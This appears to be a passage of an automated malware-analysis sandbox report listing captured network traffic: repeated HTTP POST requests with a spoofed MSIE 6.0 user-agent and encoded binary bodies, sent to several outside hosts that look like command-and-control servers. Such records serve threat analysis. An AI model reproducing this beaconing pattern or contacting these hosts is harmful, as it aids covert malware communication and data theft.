31 70 41 55 6a 39 46 67 74 48 68 4f 70 73 72 6a 69 72 51 41 41 61 6b 75 63 31 68 38 6e 6e 47 4a 6f 74 52 32 4c 6a 69 6e 6c 6f 52 46 6e 51 62 51 7a 77 74 4d 46 41 78 53 55 77 4a 6a 71 6d 66 45 52 72 69 71 62 6b 57 67 71 6f 2f 47 43 54 4a 73 6d 6c 65 4e 6f 74 59 69 4b 52 38 36 63 46 61 44 43 37 4b 76 63 71 55 49 6c 32 31 73 4a 55 46 52 65 70 64 6a 58 55 6b 50 6d 4a 6a 75 45 76 76 44 6d 39 67 78 75 34 4a 6a 59 48 67 62 2b 33 46 59 4e 4b 33 48 44 74 31 43 41 4d 58 52 53 75 4b 66 6b 45 6e 74 6c 68 4a 37 70 58 51 65 4e 2f 44 51 64 4b 53 30 62 54 6b 31 53 32 37 6a 45 69 7a 7a 6b 59 5a 31 34 49 74 4d 4a 79 6e 56 37 42 56 51 59 71 6e 61 4b 6b 65 73 67 47 59 41 36 78 4c 52 45 64 41 45 58 59 71 4c 39 44 66 53 6a 68 5a 76 45 73 66 48 57 4c 41 37 76 37 39 50 77 62 71 6a 76 56 59 31 52 31 34 55 38 30 5a 52 42 68 53 52 43 64 34 77 58 38 64 34 39 61 61 74 69 4e 6e 43 78 46 6b 67 76 7a 4d 6b 30 4c 57 39 47 56 72 47 4e 30 4c 72 54 63 77 7a 51 3d Data Ascii: SqWwuTpjqw6POjBr3RlW9X2AzXiqk/f+Dnn/kG7YzuOusJ6qfMxCPPgdqFgHMGXEEwMZYJpR+CT0IesBdj3l7vZiJ9mVf7MIEssznwZ6g/cFByC0uVMEw+I9I1Dw8g92YUMJnueLInR215eoFSjHOkMKF2BVDI3vtqYl+kWbYlR30LB5EpTJ+s23Kd5FyLYAVkeP0pCPCjwjp7NLgDZiVp4Rtj1pAUj9FgtHhOpsrjirQAAakuc1h8nnGJotR2LjinloRFnQbQzwtMFAxSUwJjqmfERriqbkWgqo/GCTJsmleNotYiKR86cFaDC7KvcqUIl21sJUFRepdjXUkPmJjuEvvDm9gxu4JjYHgb+3FYNK3HDt1CAMXRSuKfkEntlhJ7pXQeN/DQdKS0bTk1S27jEizzkYZ14ItMJynV7BVQYqnaKkesgGYA6xLREdAEXYqL9DfSjhZvEsfHWLA7v79PwbqjvVY1R14U80ZRBhSRCd4wX8d49aatiNnCxFkgvzMk0LW9GVrGN0LrTcwzQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 43 50 69 57 52 44 7a 31 6c 67 35 35 37 35 35 55 35 30 2b 72 45 73 2b 66 4f 54 4c 55 59 6c 6f 6e 4d 50 6f 66 4b 7a 55 31 6d 44 61 4e 53 74 33 4b 2f 73 77 32 36 6a 37 67 34 55 47 32 70 2f 6f 31 72 76 7a 30 34 46 55 51 6d 34 4b 63 43 66 66 39 78 44 55 47 52 46 50 68 4b 35 6f 2f 68 33 6b 39 66 63 73 70 4f 70 2f 63 56 6a 55 36 4e 7a 45 57 78 6b 70 41 4c 34 53 77 68 30 7a 2b 67 36 38 6b 38 75 6c 45 62 33 58 52 52 36 4b 32 58 76 57 6b 6a 52 37 59 30 6b 70 65 4f 6a 31 36 44 52 42 6d 71 6e 54 4b 58 73 44 50 52 69 69 58 77 75 36 69 34 76 4e 68 6f 48 2f 5a 69 4a 49 6a 36 55 57 55 70 77 71 74 63 43 33 34 38 47 37 74 4d 34 46 2b 2f 73 57 74 42 2b 46 54 4b 64 71 6a 41 4c 34 7a 6f 56 33 33 70 66 38 6b 6a 39 31 61 45 49 42 66 52 56 35 78 30 7a 37 45 55 37 78 46 55 34 6a 39 6f 71 75 4f 77 6f 56 30 6c 75 52 55 39 43 53 73 5a 58 37 6a 37 41 53 76 58 45 72 50 30 65 52 59 73 49 74 64 6e 79 77 4c 55 31 79 38 50 78 4e 62 30 57 6e 43 68 76 56 4f 42 32 51 35 6b 7a 2b 46 2f 2f 67 6b 31 78 50 62 36 59 61 50 67 42 50 37 4c 74 47 43 34 72 59 6a 37 53 31 65 39 4c 32 54 47 61 72 42 49 79 67 57 6d 62 6b 39 64 43 54 51 4e 56 55 52 4f 59 31 7a 67 57 34 39 32 34 6f 67 57 30 61 75 37 46 72 35 4e 46 41 48 67 31 78 6e 6d 72 6f 5a 32 4d 6e 7a 79 62 4d 69 30 32 65 61 4e 77 32 33 75 47 69 64 70 68 38 2f 72 6a 56 4b 54 72 78 50 58 32 66 74 52 41 62 49 49 6c 70 6c 56 77 4a 53 4c 4c 34 73 44 5a 48 51 71 4c 33 36 51 6b 38 49 56 36 58 67 42 43 71 47 43 46 34 30 6b 2b 61 4f 33 4c 6c 32 70 46 6d 66 38 2b 45 61 57 32 49 4c 7a 62 75 4b 31 4c 7a 4a 78 78 48 69 5a 43 68 69 56 64 48 56 56 53 75 42 47 6e 70 70 39 51 4d 5a 39 69 52 4e 42 51 48 63 53 7a 4d 45 32 50 77 3d Data Ascii: CPiWRDz1lg55755U50+rEs+fOTLUYlonMPofKzU1mDaNSt3K/sw26j7g4UG2p/o1rvz04FUQm4KcCff9xDUGRFPhK5o/h3k9fcspOp/cVjU6NzEWxkpAL4Swh0z+g68k8ulEb3XRR6K2XvWkjR7Y0kpeOj16DRBmqnTKXsDPRiiXwu6i4vNhoH/ZiJIj6UWUpwqtcC348G7tM4F+/sWtB+FTKdqjAL4zoV33pf8kj91aEIBfRV5x0z7EU7xFU4j9oquOwoV0luRU9CSsZX7j7ASvXErP0eRYsItdnywLU1y8PxNb0WnChvVOB2Q5kz+F//gk1xPb6YaPgBP7LtGC4rYj7S1e9L2TGarBIygWmbk9dCTQNVUROY1zgW4924ogW0au7Fr5NFAHg1xnmroZ2MnzybMi02eaNw23uGidph8/rjVKTrxPX2ftRAbIIlplVwJSLL4sDZHQqL36Qk8IV6XgBCqGCF40k+aO3Ll2pFmf8+EaW2ILzbuK1LzJxxHiZChiVdHVVSuBGnpp9QMZ9iRNBQHcSzME2Pw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1690486980.2513919Data Raw: 58 53 2b 66 70 46 4d 45 73 77 35 6f 49 2f 7a 49 47 6a 31 61 75 2f 7a 56 4d 37 67 35 30 64 52 57 4e 77 2b 41 66 54 78 4e 50 66 4e 75 73 43 67 6a 7a 66 58 35 77 77 6b 7a 67 62 6f 62 6f 4a 6a 51 67 4b 42 6a 44 53 45 46 46 2f 51 4b 4e 65 72 2b 73 63 74 4a 36 51 79 6e 59 63 4a 6e 30 4a 38 30 73 7a 59 38 61 30 6a 47 34 51 49 67 71 4c 67 2f 4e 69 62 62 61 51 78 33 62 6f 54 6a 69 57 53 5a 35 31 76 66 64 56 61 39 73 73 67 43 2f 35 65 58 73 34 32 6c 2f 39 57 69 5a 62 56 53 32 75 7a 4c 69 5a 48 73 2f 37 71 6e 79 6c 34 4f 43 61 46 5a 67 6c 45 46 65 44 41 35 43 45 48 73 66 4a 59 53 4a 55 31 52 46 4f 4e 72 55 4e 41 4f 70 4e 77 57 6d 42 71 65 44 63 54 32 53 39 2f 43 6f 53 4e 33 4e 38 48 2b 6b 32 6c 4e 53 44 65 57 36 50 36 70 45 6e 74 6b 47 37 79 55 79 42 55 68 61 68 55 57 74 45 2f 65 2b 49 67 2f 62 63 36 50 6d 5a 73 59 36 48 68 77 64 6e 35 61 54 37 44 6c 71 68 38 56 69 50 69 78 4a 45 42 6f 78 31 30 79 2b 77 39 58 32 6e 30 73 55 44 79 75 4d 4d 39 73 4e 50 65 78 4b 77 31 5a 79 51 5a 52 70 6e 46 4c 44 73 30 73 46 72 42 6f 37 65 59 4a 4c 4e 71 6d 4a 4f 56 32 69 33 51 5a 42 4c 30 4b 33 36 74 77 58 78 62 65 65 70 37 38 5a 4f 49 50 38 37 48 4d 4f 6c 75 34 4b 7a 4c 51 6f 48 36 68 64 70 65 36 51 70 6f 33 44 32 66 30 34 4a 74 66 6e 42 73 37 56 64 58 51 4d 6a 45 35 53 2b 5a 2f 43 74 55 50 6e 47 4b 59 47 72 71 48 65 5a 71 6a 6a 42 54 78 4d 79 31 75 73 56 51 76 35 4f 7a 7a 75 67 4e 65 68 7a 44 53 4f 6b 69 53 72 32 32 48 51 67 39 31 52 56 59 68 33 56 48 38 33 78 6d 55 44 54 68 4d 4e 71 57 31 65 62 4f 48 67 78 48 55 49 54 65 68 4d 31 52 37 56 42 39 42 41 70 42 41 62 6a 58 4e 4e 4d 63 6d 77 43 68 31 42 70 33 34 69 4f 6f 48 6b 74 66 69 65 62 31 43 34 70 67 57 79 70 50 62 2f 50 6c 53 44 49 43 36 51 38 5a 6b Data Ascii: XS+fpFMEsw5oI/zIGj1au/zVM7g50dRWNw+AfTxNPfNusCgjzfX5wwkzgboboJjQgKBjDSEFF/QKNer+sctJ6QynYcJn0J80szY8a0jG4QIgqLg/NibbaQx3boTjiWSZ51vfdVa9ssgC/5eXs42l/9WiZbVS2uzLiZHs/7qnyl4OCaFZglEFeDA5CEHsfJYSJU1RFONrUNAOpNwWmBqeDcT2S9/CoSN3N8H+k2lNSDeW6P6pEntkG7yUyBUhahUWtE/e+Ig/bc6PmZsY6Hhwdn5aT7Dlqh8ViPixJEBox10y+w9X2n0sUDyuMM9sNPexKw1ZyQZRpnFLDs0sFrBo7eYJLNqmJOV2i3QZBL0K36twXxbeep78ZOIP87HMOlu4KzLQoH6hdpe6Qpo3D2f04JtfnBs7VdXQMjE5S+Z/CtUPnGKYGrqHeZqjjBTxMy1usVQv5OzzugNehzDSOkiSr22HQg91RVYh3VH83xmUDThMNqW1ebOHgxHUITehM1R7VB9BApBAbjXNNMcmwCh1Bp34iOoHktfieb1C4pgWypPb/PlSDIC6Q8Zk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=mmikjcccpacmhhypnhsmmibzvjxnzchh; _mcnc=1Data Raw: 35 42 4f 4a 30 76 73 74 4a 77 37 63 78 37 61 53 6b 6b 74 42 44 75 53 31 6d 30 38 42 34 50 6c 48 58 33 39 4b 6d 42 46 34 6f 79 6d 4b 79 43 57 6e 37 45 65 4b 56 4d 44 67 6b 59 79 4b 33 62 4b 64 7a 52 6c 6f 45 69 68 37 31 33 51 50 39 50 4b 34 58 65 54 4d 78 31 30 49 2b 4f 6b 57 61 2b 4e 6d 33 30 65 47 36 7a 6c 36 76 51 4f 75 68 56 35 61 2b 6d 49 76 78 4b 4e 32 45 51 43 61 50 58 33 55 70 43 6f 6b 39 78 75 44 55 79 58 56 4c 48 6c 6d 47 44 53 37 4e 34 58 71 4c 30 78 4b 52 31 59 53 44 39 52 42 67 42 45 6d 36 4c 64 5a 38 2f 73 51 71 64 41 46 38 59 39 37 32 4f 59 48 62 37 78 66 5a 35 75 4c 6f 57 75 71 49 69 35 63 44 73 43 78 32 70 2b 68 66 50 79 6f 6c 4b 6f 44 59 6b 37 61 75 6d 77 6a 4a 41 44 38 30 56 53 65 49 59 43 72 30 2b 7a 39 33 62 39 53 6e 50 63 6b 78 35 67 35 72 42 34 72 5a 63 4a 30 5a 51 4b 30 74 6d 42 67 48 5a 73 5a 6f 75 73 79 46 67 55 57 45 63 33 76 43 6b 4d 69 39 45 31 76 45 65 56 62 50 43 77 2b 68 41 6d 50 68 49 57 33 78 37 4a 35 43 31 53 76 2f 48 35 47 34 47 74 42 64 6a 74 58 41 68 74 71 73 55 41 58 39 71 56 35 6e 62 68 56 70 2b 2f 62 4e 78 4e 35 4f 41 32 34 45 67 37 62 61 71 46 38 5a 71 71 55 2b 57 68 42 39 6f 65 64 59 34 41 68 4c 68 38 44 6a 48 70 7a 46 74 62 6e 75 50 79 63 69 34 74 74 52 5a 58 71 50 52 67 62 55 47 51 50 68 6d 34 47 55 46 36 45 38 67 34 68 79 61 53 44 6f 44 55 59 67 68 57 31 7a 76 4a 46 50 48 52 47 63 4c 44 4b 33 61 44 42 7a 50 6a 39 6f 2b 34 6d 69 68 4f 53 4d 61 50 6a 50 34 62 58 68 77 4c 63 46 61 2f 4a 72 2f 35 34 72 55 75 57 36 64 6f 45 33 30 62 52 42 30 34 31 31 63 42 53 49 61 52 50 31 64 51 78 63 69 77 37 37 56 6a 37 6c 43 6f 7a 47 36 39 65 43 35 6f 41 44 41 4e 37 6a 59 53 70 46 35 62 45 69 44 33 74 43 62 6b 3d Data Ascii: 5BOJ0vstJw7cx7aSkktBDuS1m08B4PlHX39KmBF4oymKyCWn7EeKVMDgkYyK3bKdzRloEih713QP9PK4XeTMx10I+OkWa+Nm30eG6zl6vQOuhV5a+mIvxKN2EQCaPX3UpCok9xuDUyXVLHlmGDS7N4XqL0xKR1YSD9RBgBEm6LdZ8/sQqdAF8Y972OYHb7xfZ5uLoWuqIi5cDsCx2p+hfPyolKoDYk7aumwjJAD80VSeIYCr0+z93b9SnPckx5g5rB4rZcJ0ZQK0tmBgHZsZousyFgUWEc3vCkMi9E1vEeVbPCw+hAmPhIW3x7J5C1Sv/H5G4GtBdjtXAhtqsUAX9qV5nbhVp+/bNxN5OA24Eg7baqF8ZqqU+WhB9oedY4AhLh8DjHpzFtbnuPyci4ttRZXqPRgbUGQPhm4GUF6E8g4hyaSDoDUYghW1zvJFPHRGcLDK3aDBzPj9o+4mihOSMaPjP4bXhwLcFa/Jr/54rUuW6doE30bRB0411cBSIaRP1dQxciw77Vj7lCozG69eC5oADAN7jYSpF5bEiD3tCbk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 4a 2b 73 33 46 75 6b 45 76 77 36 5a 53 30 71 32 75 41 6e 59 6b 67 49 68 4a 71 75 48 68 4a 79 4b 4c 66 36 36 35 65 43 46 52 6c 78 34 77 52 58 67 45 4a 4e 71 4e 2f 46 74 72 6a 6b 50 6a 74 63 6f 6f 75 73 50 77 57 4f 2f 39 36 34 74 52 56 50 55 49 46 43 64 50 78 2b 62 65 7a 53 4c 74 4d 55 61 48 76 45 38 58 56 73 30 4a 78 49 64 39 4a 6a 43 59 65 74 68 6f 33 47 48 6e 4e 41 75 4d 77 41 79 4c 31 32 33 69 54 64 6f 36 53 58 6a 56 65 6e 79 77 75 5a 77 78 4b 61 6d 74 6f 78 47 55 39 78 64 31 72 38 77 45 31 68 31 7a 70 6a 54 74 48 6a 72 56 4b 41 50 4d 4c 4e 69 65 4b 45 45 54 71 50 79 31 48 79 63 6e 47 38 72 4e 37 57 78 71 47 69 37 6c 68 6c 52 69 41 55 68 62 33 31 44 44 75 49 6a 33 43 72 66 6a 67 73 6f 36 69 64 4f 46 69 65 73 48 65 49 74 75 66 4b 34 4a 6c 4e 6f 68 48 72 35 73 64 2b 75 52 35 45 71 53 46 42 70 77 75 32 4c 45 49 77 4d 33 63 52 33 39 31 69 58 4d 42 62 75 55 32 35 33 66 54 4d 61 70 46 4c 45 36 46 61 63 44 4e 37 52 42 51 34 68 6f 41 61 59 73 58 62 53 49 64 6a 42 76 70 48 51 41 52 4c 76 57 65 74 6c 38 52 6f 58 50 31 47 44 39 2b 4c 38 34 69 77 63 53 4b 57 53 66 35 50 63 73 4f 47 59 54 67 43 4f 64 4b 78 71 2f 53 4a 35 4b 6c 73 4d 61 42 66 34 30 41 79 45 42 6f 77 6a 58 39 62 4a 37 50 64 52 6f 56 75 32 52 59 4e 4a 4e 77 61 52 78 61 6a 53 4f 43 59 54 37 30 74 41 59 38 36 66 35 37 47 45 6f 5a 59 49 4e 55 54 73 65 6e 2f 79 48 2b 58 4b 49 6b 65 57 6d 65 7a 55 41 58 5a 49 68 43 55 5a 6e 71 6d 54 33 61 6d 65 57 45 43 38 70 41 61 4a 54 69 77 4a 58 71 34 33 4d 63 46 50 64 4d 62 36 65 36 45 72 46 56 47 35 6c 74 37 53 63 63 77 39 71 4e 65 30 74 63 30 65 79 59 43 77 6a 4d 36 4c 4b 41 76 4b 2b 65 53 4d 64 6c 55 30 46 57 72 6a 32 37 33 75 Data Ascii: J+s3FukEvw6ZS0q2uAnYkgIhJquHhJyKLf665eCFRlx4wRXgEJNqN/FtrjkPjtcoousPwWO/964tRVPUIFCdPx+bezSLtMUaHvE8XVs0JxId9JjCYetho3GHnNAuMwAyL123iTdo6SXjVenywuZwxKamtoxGU9xd1r8wE1h1zpjTtHjrVKAPMLNieKEETqPy1HycnG8rN7WxqGi7lhlRiAUhb31DDuIj3Crfjgso6idOFiesHeItufK4JlNohHr5sd+uR5EqSFBpwu2LEIwM3cR391iXMBbuU253fTMapFLE6FacDN7RBQ4hoAaYsXbSIdjBvpHQARLvWetl8RoXP1GD9+L84iwcSKWSf5PcsOGYTgCOdKxq/SJ5KlsMaBf40AyEBowjX9bJ7PdRoVu2RYNJNwaRxajSOCYT70tAY86f57GEoZYINUTsen/yH+XKIkeWmezUAXZIhCUZnqmT3ameWEC8pAaJTiwJXq43McFPdMb6e6ErFVG5lt7Sccw9qNe0tc0eyYCwjM6LKAvK+eSMdlU0FWrj273u
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 4e 37 45 39 46 68 73 46 76 77 36 72 69 4f 77 77 4d 76 66 4e 6c 77 51 2b 4b 44 53 68 6c 65 44 47 66 7a 43 4a 76 38 35 41 37 78 69 5a 65 75 75 76 64 77 42 63 6b 6c 69 43 58 38 35 72 51 49 34 6d 32 50 74 61 61 37 46 58 57 72 36 65 52 34 43 41 70 6f 46 69 2f 5a 49 74 42 2b 30 4a 67 72 66 77 42 64 68 45 4c 42 52 74 6e 34 6c 67 73 42 68 71 61 74 58 76 65 6c 6a 67 33 65 70 79 39 5a 77 64 6a 33 4b 71 51 45 4a 35 2f 59 6a 6e 2f 54 72 38 36 42 4b 74 31 72 6f 4c 67 36 6d 71 4a 34 2f 5a 74 71 7a 34 49 54 7a 50 63 42 61 4f 6f 67 52 6a 74 54 2b 51 6f 44 65 79 6a 34 74 4c 4c 62 68 65 30 78 56 47 41 76 7a 68 4d 6f 6f 6e 38 6b 56 4f 48 77 53 72 54 73 2f 35 2f 52 57 42 4a 4a 6c 78 33 6c 35 45 66 67 33 5a 6b 4e 6e 42 77 61 77 6c 73 48 7a 62 77 64 62 70 62 56 74 2b 6b 6f 67 57 31 63 4f 66 37 62 55 4d 30 4d 71 62 73 44 6b 37 6d 79 48 48 71 6d 6c 2f 42 33 57 56 61 66 67 37 34 75 4a 54 66 41 31 4c 33 62 64 45 33 53 37 47 7a 4c 31 75 4b 4e 44 51 33 35 6b 78 64 35 55 6e 70 48 50 78 62 43 63 43 4a 78 78 7a 45 43 44 50 46 4b 56 43 70 52 4b 57 52 54 57 74 58 6a 53 39 48 73 56 4c 6f 59 5a 67 48 57 47 56 63 6d 49 47 6f 66 64 68 75 59 64 53 75 38 4c 64 51 30 4b 48 6d 6d 70 35 6d 41 55 4a 37 34 75 78 6e 2f 30 73 2b 45 76 41 6f 32 72 7a 43 73 30 79 42 55 32 48 59 65 4f 71 57 34 50 41 44 36 49 71 34 6a 57 2f 53 45 51 41 31 2f 46 75 6d 47 6e 71 46 51 53 6f 4c 33 37 67 33 49 67 31 43 6f 6b 37 77 77 31 59 4e 49 5a 58 79 64 4b 6c 35 4f 76 71 5a 58 6e 4c 48 79 74 51 71 4b 74 47 6c 52 42 4e 62 4c 6f 6c 4e 6a 6d 2f 54 57 63 50 32 39 45 6d 4e 58 32 4a 52 77 36 63 46 64 78 45 64 37 2b 6e 77 42 57 75 32 65 61 6b 76 42 4f 4e 64 67 6f 6e 49 64 70 48 5a 34 63 6d Data Ascii: N7E9FhsFvw6riOwwMvfNlwQ+KDShleDGfzCJv85A7xiZeuuvdwBckliCX85rQI4m2Ptaa7FXWr6eR4CApoFi/ZItB+0JgrfwBdhELBRtn4lgsBhqatXveljg3epy9Zwdj3KqQEJ5/Yjn/Tr86BKt1roLg6mqJ4/Ztqz4ITzPcBaOogRjtT+QoDeyj4tLLbhe0xVGAvzhMoon8kVOHwSrTs/5/RWBJJlx3l5Efg3ZkNnBwawlsHzbwdbpbVt+kogW1cOf7bUM0MqbsDk7myHHqml/B3WVafg74uJTfA1L3bdE3S7GzL1uKNDQ35kxd5UnpHPxbCcCJxxzECDPFKVCpRKWRTWtXjS9HsVLoYZgHWGVcmIGofdhuYdSu8LdQ0KHmmp5mAUJ74uxn/0s+EvAo2rzCs0yBU2HYeOqW4PAD6Iq4jW/SEQA1/FumGnqFQSoL37g3Ig1Cok7ww1YNIZXydKl5OvqZXnLHytQqKtGlRBNbLolNjm/TWcP29EmNX2JRw6cFdxEd7+nwBWu2eakvBONdgonIdpHZ4cm
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 4e 37 45 39 46 68 73 46 76 77 36 72 69 4f 77 77 4d 76 66 4e 6c 77 51 2b 4b 44 53 68 6c 65 44 47 66 7a 43 4a 76 38 35 41 37 78 69 5a 65 75 75 76 64 77 42 63 6b 6c 69 43 58 38 35 72 51 49 34 6d 32 50 74 61 61 37 46 58 57 72 36 65 52 34 43 41 70 6f 46 69 2f 5a 49 74 42 2b 30 4a 67 72 66 77 42 64 68 45 4c 42 52 74 6e 34 6c 67 73 42 68 71 61 74 58 76 65 6c 6a 67 33 65 70 79 39 5a 77 64 6a 33 4b 71 51 45 4a 35 2f 59 6a 6e 2f 54 72 38 36 42 4b 74 31 72 6f 4c 67 36 6d 71 4a 34 2f 5a 74 71 7a 34 49 54 7a 50 63 42 61 4f 6f 67 52 6a 74 54 2b 51 6f 44 65 79 6a 34 74 4c 4c 62 68 65 30 78 56 47 41 76 7a 68 4d 6f 6f 6e 38 6b 56 4f 48 77 53 72 54 73 2f 35 2f 52 57 42 4a 4a 6c 78 33 6c 35 45 66 67 33 5a 6b 4e 6e 42 77 61 77 6c 73 48 7a 62 77 64 62 70 62 56 74 2b 6b 6f 67 57 31 63 4f 66 37 62 55 4d 30 4d 71 62 73 44 6b 37 6d 79 48 48 71 6d 6c 2f 42 33 57 56 61 66 67 37 34 75 4a 54 66 41 31 4c 33 62 64 45 33 53 37 47 7a 4c 31 75 4b 4e 44 51 33 35 6b 78 64 35 55 6e 70 48 50 78 62 43 63 43 4a 78 78 7a 45 43 44 50 46 4b 56 43 70 52 4b 57 52 54 57 74 58 6a 53 39 48 73 56 4c 6f 59 5a 67 48 57 47 56 63 6d 49 47 6f 66 64 68 75 59 64 53 75 38 4c 64 51 30 4b 48 6d 6d 70 35 6d 41 55 4a 37 34 75 78 6e 2f 30 73 2b 45 76 41 6f 32 72 7a 43 73 30 79 42 55 32 48 59 65 4f 71 57 34 50 41 44 36 49 71 34 6a 57 2f 53 45 51 41 31 2f 46 75 6d 47 6e 71 46 51 53 6f 4c 33 37 67 33 49 67 31 43 6f 6b 37 77 77 31 59 4e 49 5a 58 79 64 4b 6c 35 4f 76 71 5a 58 6e 4c 48 79 74 51 71 4b 74 47 6c 52 42 4e 62 4c 6f 6c 4e 6a 6d 2f 54 57 63 50 32 39 45 6d 4e 58 32 4a 52 77 36 63 46 64 78 45 64 37 2b 6e 77 42 57 75 32 65 61 6b 76 42 4f 4e 64 67 6f 6e 49 64 70 48 5a 34 63 6d Data Ascii: N7E9FhsFvw6riOwwMvfNlwQ+KDShleDGfzCJv85A7xiZeuuvdwBckliCX85rQI4m2Ptaa7FXWr6eR4CApoFi/ZItB+0JgrfwBdhELBRtn4lgsBhqatXveljg3epy9Zwdj3KqQEJ5/Yjn/Tr86BKt1roLg6mqJ4/Ztqz4ITzPcBaOogRjtT+QoDeyj4tLLbhe0xVGAvzhMoon8kVOHwSrTs/5/RWBJJlx3l5Efg3ZkNnBwawlsHzbwdbpbVt+kogW1cOf7bUM0MqbsDk7myHHqml/B3WVafg74uJTfA1L3bdE3S7GzL1uKNDQ35kxd5UnpHPxbCcCJxxzECDPFKVCpRKWRTWtXjS9HsVLoYZgHWGVcmIGofdhuYdSu8LdQ0KHmmp5mAUJ74uxn/0s+EvAo2rzCs0yBU2HYeOqW4PAD6Iq4jW/SEQA1/FumGnqFQSoL37g3Ig1Cok7ww1YNIZXydKl5OvqZXnLHytQqKtGlRBNbLolNjm/TWcP29EmNX2JRw6cFdxEd7+nwBWu2eakvBONdgonIdpHZ4cm
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 69 35 55 78 78 64 4d 44 7a 51 36 6a 6c 65 64 47 6d 6a 66 35 43 33 79 42 4c 34 57 35 42 6e 48 46 74 30 5a 47 52 57 66 33 4a 4b 2b 69 56 69 6b 46 47 2b 59 45 6b 4a 4b 69 2f 49 50 63 59 54 54 56 56 46 77 52 6a 73 6c 67 70 4c 6c 72 67 6d 75 67 43 47 64 55 69 34 77 64 79 4b 66 75 36 54 45 34 73 57 41 39 31 4d 64 7a 38 6b 41 75 67 47 32 53 4f 46 69 71 68 69 41 79 78 32 36 33 6b 6b 7a 59 44 53 6d 63 7a 55 55 56 4a 74 32 33 32 46 63 73 37 31 37 58 49 68 42 6c 67 57 36 4a 41 6c 4c 68 6c 66 47 6b 50 64 49 34 50 66 7a 6b 31 36 58 63 59 4e 78 35 7a 6d 58 50 46 6f 52 55 6b 59 4b 2f 67 78 4d 4a 48 6d 37 2b 6f 58 6e 2b 59 56 2f 33 78 53 4c 59 4a 32 56 79 6d 39 4f 59 45 35 54 35 63 33 49 45 48 5a 6d 2b 6e 70 6e 49 6d 73 64 31 7a 50 73 66 30 34 4e 6a 76 4b 54 52 73 6a 44 50 70 7a 63 51 59 70 72 52 50 6b 68 4f 6d 6c 4d 5a 76 4f 34 70 7a 32 54 36 7a 36 2f 50 4e 70 36 4b 5a 61 6c 36 54 66 70 69 46 4b 41 4f 46 72 33 66 59 4e 52 65 47 73 44 44 5a 76 73 66 66 4a 32 2b 6c 4b 51 68 56 51 78 6e 6b 31 2f 34 4f 74 6b 2b 4e 78 70 35 79 37 50 66 41 5a 51 41 7a 74 78 4f 34 57 6d 6c 6b 49 44 68 4d 62 30 4a 56 37 67 50 71 76 30 76 53 62 51 78 34 49 71 6a 63 58 36 67 65 56 61 33 33 76 4d 72 67 42 73 6f 78 50 73 34 6c 6c 35 39 70 6e 38 2f 58 66 37 4a 61 64 72 67 53 43 38 33 4a 34 6a 65 72 6a 66 71 70 77 68 2f 63 5a 4b 44 4b 68 55 79 44 6c 6f 6a 52 47 56 49 4f 6a 35 70 31 75 75 43 64 42 42 30 70 67 33 69 71 58 56 49 63 4e 50 58 41 74 33 74 4c 63 32 6f 2f 69 56 55 41 4c 65 6f 56 42 48 75 38 42 4a 79 6a 68 48 4b 6f 41 6d 54 36 57 42 51 49 45 73 74 42 67 44 77 4e 64 70 38 65 77 6a 69 49 4c 58 78 43 45 68 74 58 73 7a 72 36 73 78 74 6c 6d 57 4e Data Ascii: i5UxxdMDzQ6jledGmjf5C3yBL4W5BnHFt0ZGRWf3JK+iVikFG+YEkJKi/IPcYTTVVFwRjslgpLlrgmugCGdUi4wdyKfu6TE4sWA91Mdz8kAugG2SOFiqhiAyx263kkzYDSmczUUVJt232Fcs717XIhBlgW6JAlLhlfGkPdI4Pfzk16XcYNx5zmXPFoRUkYK/gxMJHm7+oXn+YV/3xSLYJ2Vym9OYE5T5c3IEHZm+npnImsd1zPsf04NjvKTRsjDPpzcQYprRPkhOmlMZvO4pz2T6z6/PNp6KZal6TfpiFKAOFr3fYNReGsDDZvsffJ2+lKQhVQxnk1/4Otk+Nxp5y7PfAZQAztxO4WmlkIDhMb0JV7gPqv0vSbQx4IqjcX6geVa33vMrgBsoxPs4ll59pn8/Xf7JadrgSC83J4jerjfqpwh/cZKDKhUyDlojRGVIOj5p1uuCdBB0pg3iqXVIcNPXAt3tLc2o/iVUALeoVBHu8BJyjhHKoAmT6WBQIEstBgDwNdp8ewjiILXxCEhtXszr6sxtlmWN
